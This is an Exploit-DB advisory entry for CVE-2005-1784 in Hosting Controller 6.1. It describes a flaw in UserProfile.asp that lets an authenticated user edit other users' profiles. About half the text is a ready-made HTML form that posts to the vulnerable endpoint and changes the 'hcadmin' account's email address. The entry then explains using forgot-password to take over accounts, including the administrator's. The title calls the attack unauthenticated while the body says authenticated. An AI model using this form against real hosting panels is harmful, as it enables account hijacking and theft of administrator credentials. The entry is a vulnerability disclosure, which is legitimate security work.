Hosting Controller <= 0.6.1 Unauthenticated User Registeration 3rd

ID EDB-ID:1015
Type exploitdb
Reporter Soroush Dalili
Modified 2005-05-27T00:00:00


Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd). CVE-2005-1784. Webapps exploit for asp platform


Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).

Title: Hosting controller program have a security bug
in "UserProfile.asp" that an authenticated user can
change other's profiles.
Why is it dangerous: a user can change other's email
address and then use forgot password to recieve their
password! also he/she can gain administrator password
by this way!
Version: 6.1 HotFix 2.0 and older
Developer url:
Comment: Hosting Controller is an application to
manage a host.

Exploit code to proof:
Change users profiles: --&gt; 

&lt;form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post"&gt;
Username : &lt;input name="UserList" value="hcadmin" type="text" size="50"&gt;
emailaddress : &lt;input name="emailaddress" value="" type="text" size="50"&gt;
firstname : &lt;input name="firstname" value="Crkchat" type="text" size="50"&gt;
&lt;input name="submit" value="submit" type="submit"&gt;

Now u can use forgot password to gain passwords! --&gt;

# [2005-05-27]